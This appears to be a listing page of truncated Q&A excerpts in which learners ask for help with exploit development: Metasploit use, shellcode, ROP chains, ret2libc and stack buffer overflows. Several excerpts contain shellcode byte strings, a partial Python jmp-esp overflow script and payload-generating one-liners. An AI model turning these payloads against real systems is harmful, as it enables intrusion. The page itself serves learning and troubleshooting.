Which exploit and which payload use?

Hi everyone and sorry for my bad English.I'm learning penetration testing.After reconnaissance and scanning of my target, I have enough information to pass to next phase.Some info I have is open ports with related running services, names of the services, service's versions, operative system of the device, firewalls used, etc.)I launched the mfs console.I should find the correct exploit and payload, based on the information collected to gain access. I've read the Metasploit Unleashed guide on offensive-security. I've learned the Metasploit Funda...Read more

How to import .C & .pl extension exploits into metasploit framework?

How can i import .C(c language) and .Pl(perl) extension module exploits into the Metasploit framework?Metasploit generally accept the .rb (ruby) extension modules?Can anyone provide tutorials to import these extension modules? I read about the immunity debugger, but I don't understand the way to convert it. Immunity debugger is used to code exploits.I just want to import the below shellcode in metasploit framework.This code is written in C language. So is there any way to import the below exploit into metasploit framework.http://www.exploit-db....Read more

exploit - Segfault when running hello world shellcode in C program

sorry if this question sounds dumb but I am very new to shellcoding and I was trying to get a hello world example to work on a 32 bit linux machine.As this is shellcoding, I used a few tricks to remove null bytes and shorten the code. Here it is:section .datasection .textglobal _start_start:;Instead of xor eax,eax;mov al,0x4push byte 0x4pop eax;xor ebx,ebxpush byte 0x1pop ebx;xor ecx,ecxcdq ; instead of xor edx,edx;mov al, 0x4;mov bl, 0x1mov dl, 0x8push 0x65726568push 0x74206948;mov ecx, esppush esppop ecxint 0x80mov al, 0x1xor ebx,ebxint 0x80T...Read more

exploit - shellcode is truncated by \x20

Why is my shellcode is truncated after \x20 opcode, when it is copied by string to stack on a second vulnerable program?--cmd.exe-- char shell[]="\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space "\xc7\x44\x24\x08\x63\x6d\x64\x2e""\x31\xc0""\x89\x44\x24\x04""\x8d\x44\x24\x08""\x89\x04\x24""\x8d\x05\xad\x23\x86\x7c""\xff\xd0";--end shell--...Read more

exploit - Bad characters in Return Oriented Programming

I am writing a rop chain for a vulnerable program (stack overflow, with NX and ASLR turned on).I follow the execution of my gadgets by watching the stack pointer on gdb peda. It works well except when it encounters a gadget mov[eax], edx; ret. This gadget gets executed, but after there is a push ebx that follows, even if I didn't put any gadget like that in my ROP chain. And in the end my exploit doesn't work. I have tried with different registers this instruction and there is always the push ebx that follows and I don't know why. Would someone...Read more

exploit - Immunity debugger: access violation when executing

I am writing a simple exploit code use jmp to esp, but after go to esp at address 00B7FC2C Immunity show error: Access violation when executing [00B7FC2C]here is my code:#!/usr/bin/python2.7import sys, os, socketfuzz = "\x41" * 248eip = "\x59\x54\xC3\x77"nops = "\x90" * 8shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5...Read more

exploit - Why return-to-libc shell using system() exits immediately?

I'm experimenting control-flow hijacking attacks on programs written in C on Linux. I'm trying to perform a simple ret-2-libc attack on a program with the No-eXecutable-stack countermeasure enabled. For this purpose I'm returning to system() function with argument /bin/sh.But I have a problem: Although my attack works and a shell is spawned successfully, the shell exits immediately after entering the first character! That is, the shell closes after I press any key!This behavior is also observable in this simple C code:int main() { system("/bin/...Read more

exploit - How to generate payload with python for buffer overflow?

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payloadThis is what I getAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�Notice ...Read more

Problems with metasploit's "Easyrmtomp3" exploit module

![enter image description here][1]I started learning exploit writing some time back and created a few exploits. One of them being an easy rm to mp3 converter, and it worked pretty well.However, now I thought about converting my exploits to metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a meterpreter ses...Read more

exploit - Different comportement of read

I'm trying to understand why this program return different errors when I change the size of the buffer:#include <stdio.h>#include <unistd.h>#include <fcntl.h>#include <errno.h>int main(){int file = open("./test",O_RDWR);//char buff[204796] = "" ; -> File Descriptor error (no seg fault)//char buff[100000]=""; -> Seg Faultchar buff[208896]=""; -> Bad Adress (no seg fault)int i = 0;while(read(file,buff+i,2048) > 0){i += 2048;};fprintf(stderr, "%s\n", strerror(errno));}Test is a file with 500000 A :)When a Bad ad...Read more

exploit - Exploiting the delay when a festival ticket is scanned

How a ticket system worksA ticket system - one you see at festivals - works like this: when a user pays for their ticket, a row is added to the database with a column named is_scanned, whose default value is set to false.As soon as a guard at the festival scans the barcode (containing an ID, and unique hash) with their device, a request is sent to the database to check if:the user matching the ID and hash has paid, and if the value of column is_scanned is still set to false.If both conditions are satisfied, it sets the value is_scanned to true,...Read more

exploit - VPS compromised? Configured wrong?

I've been renting a VPS for half a year now (educational purposes) and I've been trying to learn as much as possible about keeping it secure. Recently, it was compromised and I suspect that it has been used as someone's proxy for ~a week before I realized. I had logs from users 'anonymous' and 'nobody' logging in and out via SSH, and the CPU usage was off the chart - literally. In any case, I reinstalled it and I re-applied everything I knew to test if it'll happen again, and within the short 24 hours after the reinstall, I think it did.Here ar...Read more

exploit - How do I prevent tampering with form submission data, and changing the details for any account?

Although this is something that only employees can use, I'd like to prevent the tampering anyway. I don't like insecure code, and this is hideously insecure.Here's an example link:<a href="#' + j.id + '" onclick="LoadThis(\'Test.aspx?id=' + obj.id + '\', \'post\', null, null);">Edit User #' + j.id + '.</a>I sent this to the client side using jQuery:$.ajax({ url: "Test.aspx/RemoveUsernameByID", type: "POST", data: 1, beforeSend: function (before) { /* do stuff */ }, success: function (success) { /* do stuff */ }, er...Read more

exploit - Perl doesn't print 0x00

I wanted to experiment with the NOP SLED technique. I got the sled and the shellcode into an environment variable and I got its address.So i wanted to execute the vulnerable program and as an argument use this address repeated,the problem is that it contain 0s (zeros): 0x00007fffffffe550./program_vuln $(perl -e 'print "\x50\xe5\xff\xff\xff\x7f\x00\x00"')Perl does not print the zeroes and the addressing in the stack became so messed up....Read more